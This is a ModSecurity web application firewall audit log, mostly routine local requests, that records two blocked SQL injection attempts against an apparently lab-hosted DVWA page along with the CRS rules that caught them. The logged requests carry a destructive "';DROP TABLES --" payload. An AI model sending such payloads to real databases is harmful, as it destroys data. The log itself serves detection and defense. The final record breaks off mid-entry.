{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc2438AAQEAAAkW4SIAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2438AAQEAAAkW4SIAAAAB\"]"],"stopwatch":{"p1":391,"p2":1063,"p3":138,"p4":334,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:15 --0400","transaction_id":"WRc2738AAQEAAAkXs@sAAAAC","remote_address":"192.168.75.181","remote_port":46620,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":605,"p2":2936,"p3":0,"p4":0,"p5":271,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:17 --0400","transaction_id":"WRc28X8AAQEAAAkXs@wAAAAC","remote_address":"192.168.75.181","remote_port":46620,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":382,"p2":2019,"p3":0,"p4":0,"p5":158,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFYAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:40:00 GMT","If-None-Match":"\"294-54f6a791bc669\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:40:22 GMT","ETag":"\"295-54f6a7a6d5cf8\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2@X8AAQEAAAkYuFYAAAAD\"]"],"stopwatch":{"p1":383,"p2":1113,"p3":60,"p4":147,"p5":52,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFcAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2@X8AAQEAAAkYuFcAAAAD\"]"],"stopwatch":{"p1":709,"p2":1219,"p3":69,"p4":465,"p5":71,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFgAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2@X8AAQEAAAkYuFgAAAAD\"]"],"stopwatch":{"p1":775,"p2":1300,"p3":114,"p4":423,"p5":91,"sr":38,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5IAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:40:22 GMT","If-None-Match":"\"295-54f6a7a6d5cf8\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:44:41 GMT","ETag":"\"295-54f6a89db971f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at 